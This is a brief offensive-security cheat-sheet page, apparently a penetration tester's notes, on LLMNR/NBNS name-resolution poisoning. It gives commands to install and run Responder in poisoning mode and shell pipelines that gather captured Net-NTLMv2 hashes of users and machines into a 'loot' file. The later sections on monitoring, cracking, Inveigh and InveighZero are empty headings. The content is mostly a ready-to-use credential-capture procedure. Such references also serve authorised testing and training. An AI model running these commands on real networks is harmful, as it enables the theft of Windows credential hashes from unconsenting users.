search
TwitterGitHubBlog

LLMNR / NBNS Poisoning

Link-Local Multicast Name Resolution / NetBIOS Name Service

hashtag
Responder

Install:

$ git clone https://github.com/lgandx/Responder ~/tools/Responder && cd ~/tools/Responder

Run:

$ sudo ./Responder.py -I eth0 -Av
$ sudo ./Responder.py -I eth0 -wd -P -v

Parse, sort and save hashes:

# Users
$ cat logs/*.txt | grep -a . | grep -a -v -e 'logs/' -e '\$' | sort -u -t: -k1,1 > net-ntlmv2.responder
$ sort -u -t: -k1,1 net-ntlmv2.responder ~/ws/loot/net-ntlmv2.txt > t
$ mv t ~/ws/loot/net-ntlmv2.txt && rm net-ntlmv2.responder

# Machines
$ cat logs/*.txt | grep -a '\$' | sort -u -t: -k1,1

Monitor new hashes:

Crack:

hashtag
Inveigh

hashtag
InveighZero

Last updated